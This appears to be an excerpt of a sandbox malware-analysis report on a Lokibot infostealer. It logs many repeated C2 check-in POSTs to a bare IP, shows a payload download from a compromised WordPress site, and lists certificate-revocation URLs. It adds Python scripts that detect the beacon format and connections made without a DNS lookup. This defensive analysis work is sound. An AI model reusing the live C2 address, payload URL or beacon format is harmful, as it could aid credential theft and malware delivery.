                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic; HTTP traffic detected (25 identical requests observed):
POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 149
Connection: close
The hard-coded User-Agent "Mozilla/4.08 (Charon; Inferno)" and the non-standard Content-Key header are characteristic of Lokibot's HTTP check-in and corroborate the Lokibot detection above; the gate is addressed by bare IP over HTTP/1.0, so these connections are not preceded by any DNS lookup.
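The check-in shape captured above (and the later 176-byte POST to the same gate) is easy to turn into a detection that runs over raw request heads from a proxy or PCAP export. The following is an added example, not Joe Sandbox code and not anything from the malware: the two beacon samples are reconstructed from this report's captured requests, the two benign requests and the host api.example.com are constructed for contrast, and the scoring rule (a strong indicator plus one corroborating one) is an assumption chosen to keep an ordinary octet-stream upload from firing.

```python
"""Flag HTTP request heads that match the Lokibot C2 beacon shape shown in this report.

Added example; the rule set below is an assumption derived from the report's
captured requests, not code from Joe Sandbox or from the malware.
"""
from dataclasses import dataclass, field
import re

# The User-Agent and the Content-Key header are taken verbatim from the captured POSTs.
LOKIBOT_UA = "Mozilla/4.08 (Charon; Inferno)"
BARE_IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")


@dataclass
class HttpRequest:
    method: str
    path: str
    version: str
    headers: dict = field(default_factory=dict)  # header names lower-cased


def parse_request(raw: str) -> HttpRequest:
    """Parse a raw request head (request line plus headers, CRLF or LF separated)."""
    lines = [ln for ln in raw.replace("\r\n", "\n").split("\n") if ln.strip()]
    method, path, version = lines[0].split(" ", 2)
    req = HttpRequest(method, path, version)
    for ln in lines[1:]:
        name, _, value = ln.partition(":")
        req.headers[name.strip().lower()] = value.strip()
    return req


def lokibot_indicators(req: HttpRequest) -> list:
    """Return the individual indicators a request matches (empty list for clean traffic)."""
    hits = []
    if req.headers.get("user-agent") == LOKIBOT_UA:
        hits.append("hardcoded Lokibot User-Agent")
    if "content-key" in req.headers:
        hits.append("non-standard Content-Key header")
    if (req.method == "POST" and req.version == "HTTP/1.0"
            and req.headers.get("content-type") == "application/octet-stream"):
        hits.append("HTTP/1.0 POST with raw binary body")
    if BARE_IPV4.match(req.headers.get("host", "")) and req.path.endswith(".php"):
        hits.append("PHP gate addressed by bare IP")
    return hits


def is_lokibot_beacon(raw: str) -> bool:
    """True when a strong indicator (UA or Content-Key) is corroborated by at least one more."""
    hits = lokibot_indicators(parse_request(raw))
    strong = any(h.startswith(("hardcoded", "non-standard")) for h in hits)
    return strong and len(hits) >= 2


# Reconstructed from the two POSTs in this report (the export ran the header lines together).
BEACON_149 = (
    "POST /morx/1/cgi.php HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    "Host: 185.206.215.56\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Encoding: binary\r\n"
    "Content-Key: 598F9AF4\r\n"
    "Content-Length: 149\r\n"
    "Connection: close\r\n"
)
BEACON_176 = BEACON_149.replace("Content-Length: 149", "Content-Length: 176")

# Constructed contrast cases: the payload download from this report (malicious, but not a
# beacon, so the rule must stay quiet) and an ordinary upload to a hypothetical API host.
STAGER_GET = (
    "GET /wp-content/themes/index/QPR-3067.exe HTTP/1.1\r\n"
    "Host: bighoreca.nl\r\n"
    "Connection: Keep-Alive\r\n"
)
BENIGN_POST = (
    "POST /api/v1/upload HTTP/1.1\r\n"
    "Host: api.example.com\r\n"
    "User-Agent: curl/8.4.0\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Length: 149\r\n"
)

if __name__ == "__main__":
    for name, raw in [("BEACON_149", BEACON_149), ("BEACON_176", BEACON_176),
                      ("STAGER_GET", STAGER_GET), ("BENIGN_POST", BENIGN_POST)]:
        print(f"{name}: beacon={is_lokibot_beacon(raw)} "
              f"indicators={lokibot_indicators(parse_request(raw))}")
```

The User-Agent alone would be enough in practice, but requiring a second indicator means a rule copied into a proxy log pipeline survives the day an operator changes the UA string and keeps the Content-Key header.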
Source: unknown; TCP traffic detected without corresponding DNS query: 185.206.215.56 (50 connections observed)
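The "TCP traffic without corresponding DNS query" signature is a correlation between two event streams: every connection to a public address should be explainable by a DNS answer that was still valid when the connection was made. The following is an added example of that correlation, not sandbox code. The DNS answers and connections are constructed; 198.51.100.10 and 203.0.113.7 are documentation addresses standing in for whatever cutt.ly and bighoreca.nl actually resolved to, and the 60-second slack for cached answers is an assumed tuning value.

```python
"""Flag TCP connections to public addresses that no preceding DNS answer produced.

Added example, not sandbox code. Sample data is constructed.
"""
from collections import Counter
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Ranges that are never reached via a lookup of a public name; skipped to avoid noise.
NON_ROUTED = [ip_network(n) for n in
              ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


@dataclass(frozen=True)
class DnsAnswer:
    ts: float      # seconds since capture start
    qname: str
    ip: str
    ttl: int


@dataclass(frozen=True)
class TcpConn:
    ts: float
    dst_ip: str
    dst_port: int


def connections_without_dns(dns, conns, slack=60.0):
    """Return (connection, reason) pairs for connections whose destination was not
    produced by a DNS answer still inside its TTL (plus `slack` seconds for resolver
    caching and clock skew) at connect time."""
    flagged = []
    for c in sorted(conns, key=lambda x: x.ts):
        dst = ip_address(c.dst_ip)
        if any(dst in net for net in NON_ROUTED):
            continue
        prior = [a for a in dns if a.ip == c.dst_ip and a.ts <= c.ts]
        if not prior:
            flagged.append((c, "no preceding DNS answer"))
        elif not any(c.ts <= a.ts + a.ttl + slack for a in prior):
            flagged.append((c, "DNS answer expired before connect"))
    return flagged


def count_by_destination(flagged):
    """Collapse the flagged list into per-destination counts, as the report does."""
    return Counter(f"{c.dst_ip}:{c.dst_port}" for c, _ in flagged)


# Constructed logs. The two resolved names are the ones this report's DNS section shows.
DNS_LOG = [
    DnsAnswer(100.0, "cutt.ly", "198.51.100.10", 300),
    DnsAnswer(105.0, "bighoreca.nl", "203.0.113.7", 60),
]
CONN_LOG = [
    TcpConn(101.0, "198.51.100.10", 443),   # resolved moments earlier: fine
    TcpConn(106.0, "203.0.113.7", 80),      # resolved moments earlier: fine
    TcpConn(120.0, "185.206.215.56", 80),   # the C2 gate from this report, never resolved
    TcpConn(121.0, "185.206.215.56", 80),
    TcpConn(130.0, "10.0.0.5", 445),        # private destination, ignored
    TcpConn(400.0, "203.0.113.7", 80),      # answer expired: 105 + 60 + 60 < 400
]

if __name__ == "__main__":
    hits = connections_without_dns(DNS_LOG, CONN_LOG)
    for conn, reason in hits:
        print(f"t={conn.ts:6.1f} {conn.dst_ip}:{conn.dst_port}  {reason}")
    print(count_by_destination(hits))
```

The expiry branch is the part worth arguing about: a resolver that serves a stale cached answer produces a legitimate connection with no fresh DNS record, which is why the window is TTL plus slack rather than TTL alone. On a busy host, feed the function DNS answers from the resolver's own log rather than from the client, or the slack has to grow until the check loses its value.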
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe; Code function: 17_2_00404ED4 recv,
Source: global traffic; HTTP traffic detected:
GET /wp-content/themes/index/QPR-3067.exe HTTP/1.1
Host: bighoreca.nl
Connection: Keep-Alive
Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp; String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown; DNS traffic detected: queries for: cutt.ly
Source: unknown; HTTP traffic detected:
POST /morx/1/cgi.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 185.206.215.56
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 598F9AF4
Content-Length: 176
Connection: close
Most of the URLs below are CRL, OCSP, CA certificate and certificate-policy links that sit in PowerShell's memory because its download touched the Windows certificate store (note the ctldl.windowsupdate.com authroot fetch); the trailing "0" plus one character on many of them is DER residue (0x30, the SEQUENCE tag, is ASCII "0"), not part of the URL. The hits that matter for this sample are the bighoreca.nl payload URL, which matches the GET above, and http://www.ibsensoftware.com/ in RegAsm.exe, the URL embedded in the aPLib depacker stub, which matches the "aPLib compressed binary" Yara detection.
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp; String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp; String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmp; String found in binary or memory: http://bighoreca.nl
Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmp; String found in binary or memory: http://bighoreca.nl/wp-content/themes/index/QPR-3067.exe
Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmp; String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmp; String found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp; String found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmp; String found in binary or memory: http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt0
Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmp; String found in binary or memory: http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0L
Source: powershell.exe, 00000006.00000002.2105871443.000000001D196000.00000004.00000001.sdmp; String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp; String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp; String found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp; String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp; String found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp; String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp; String found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp; String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000006.00000002.2103729703.000000001B8CC000.00000004.00000001.sdmp; String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmp; String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp; String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp; String found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmp; String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmp; String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp; String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0c
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp; String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp; String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp; String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp; String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmp, powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/DF3C24F9BFD666761B268073FE06D
Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabn
Source: powershell.exe, 00000006.00000002.2098107246.000000000025D000.00000004.00000020.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enf
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp; String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp; String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp; String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmp; String found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmp; String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp; String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.digicert.com0B
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.digicert.com0C
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.digicert.com0H
Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000006.00000002.2103729703.000000001B8CC000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.pki.gva.es0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp; String found in binary or memory: http://repository.swisssign.com/0
